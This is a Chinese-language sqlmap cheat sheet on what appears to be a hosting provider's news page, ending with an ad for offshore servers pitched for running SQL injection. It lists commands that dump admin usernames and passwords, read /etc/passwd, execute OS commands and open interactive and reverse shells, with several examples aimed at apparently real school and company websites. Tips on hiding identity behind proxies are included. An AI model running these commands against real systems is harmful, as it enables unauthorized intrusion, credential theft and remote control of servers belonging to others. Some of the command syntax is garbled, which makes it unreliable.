新闻资讯
行业资讯
sqlmap post注入案例 sqlmap常用指令和参数
2018-01-08 11:42:39
摘要:sqlmap post注入案例 sqlmap常用指令和参数

检查注入点

sqlmap.py -u "http://www.scshlx.com/TeachView.asp?id=21"

列数据库信息

sqlmap -u  "http://www.scshlx.com/TeachView.asp?id=21" --dbs

指定库名列出所有表 //最大搜索线程为10

sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables

指定库名表名列出所有字段

sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33"  -T "双引号下为指定表名admin" --columns

指定库名表名字段名dump出指定字段的内容

sqlmap -u "http://ooxx.com.tw/star_photo.php?artist_id=11" --dump -T "admin" -C "username,password"

查询表名下所有字段

sqlmap.py -u "http://www.hainanez.com/TeachView.asp?id=33" --tables --columns

Mysql注入(有多个库 必须找到有管理员的数据库)

--is-dba  当前用户权限

--dbs  所有数据库

--current-db   网站当前数据库

--users  所有数据库用户

--current-user   当前数据库用户

--tables-D"当前数据库名字"  查表名、

-T"指定的表名"-D"当前数据库名字"--columns 查字段

Cookie注入(遇到防注入)

sqlmap.py -u "http://www.scshlx.com/TeachView.asp" --cookie"id=21"--level 2   

列表名等 在上方代码后面加--tables等;  

 eg:sqlmap.py -u "http://www.hexuan.com/shownews.asp" --cookie "id=1749" --level 2 --dump -T "admin" -C "username"

有几个参数可能会用到,直接加在最后面就可以了,更多详细参数见官方文档:

–cookie=COOKIE在需要登录的地方,需要登录后的cookie

–proxy=”http://127.0.0.1:8087″   使用HTTP代理隐藏自己的身份,比如使用goagent等

–sql-query=QUERY  执行一个sql语句,不一定支持

sqlmap -u “http://url/news?id=1″ --dbms “Mysql” –users # dbms 指定数 据库类型

sqlmap -u “http://url/news?id=1″ -- users 列数据库用户

sqlmap -u “http://url/news?id=1″ -- dbs   列数据库

sqlmap -u “http://url/news?id=1″ -- passwords 数据库用户密码

sqlmap -u “http://url/news?id=1″ -- passwords-U root -v 0 #列出指定用户 数据库密码

sqlmap  -u  “http://url/news?id=1″   -- dump  -C  “password,user,id”  -T “tablename”-D “db_name”

–start 1 –stop 20 #列出指定字段,列出20 条

sqlmap -u “http://url/news?id=1″ -- dump-all -v 0 #列出所有数据库所有表

sqlmap -u “http://url/news?id=1″ -- privileges #查看权限

sqlmap -u “http://url/news?id=1″ -- privileges -U root #查看指定用户权限sqlmap -u “http://url/news?id=1″ –is-dba -v 1 #是否是数据库管理员sqlmap -u “http://url/news?id=1″ –roles #枚举数据库用户角色

sqlmap -u “http://url/news?id=1″ -- udf-inject #导入用户自定义函数(获取 系统权限!)

sqlmap -u “http://url/news?id=1″ -- dump-all –exclude-sysdbs -v 0 #列 出当前库所有表

sqlmap -u “http://url/news?id=1″ -- union-cols #union 查询表记录

sqlmap -u “http://url/news?id=1″ -- cookie “COOKIE_VALUE”#cookie注入

sqlmap -u “http://url/news?id=1″ -- b #获取banner信息

sqlmap -u “http://url/news?id=1″ -- data “id=3″#post注入

sqlmap -u “http://url/news?id=1″ - v 1 -f #指纹判别数据库类型

sqlmap -u “http://url/news?id=1″ -- proxy“http://127.0.0.1:8118” #代理注 入

sqlmap -u “http://url/news?id=1″ -- string”STRING_ON_TRUE_PAGE”# 指 定关键词

sqlmap -u “http://url/news?id=1″ -- sql-shell #执行指定sql命令

sqlmap -u “http://url/news?id=1″ -- file /etc/passwd

sqlmap -u “http://url/news?id=1″ -- os-cmd=whoami #执行系统命令

sqlmap -u “http://url/news?id=1″ -- os-shell #系统交互shell 

sqlmap -u “http://url/news?id=1″ –os-pwn #反弹shell

sqlmap -u “http://url/news?id=1″ -- reg-read #读取win系统注册表

sqlmap -u “http://url/news?id=1″ -- dbs-o “sqlmap.log”#保存进度

sqlmap -u “http://url/news?id=1″ -- dbs -o “sqlmap.log” –resume #恢复 已保存进度


USA-IDC海外服务器支持sqlmap post注入,欢迎广大用户联系24小时在线客服租用

USA-IDC为您提供免备案服务器 0元试用
立即联系在线客服,即可申请免费产品试用服务
立即申请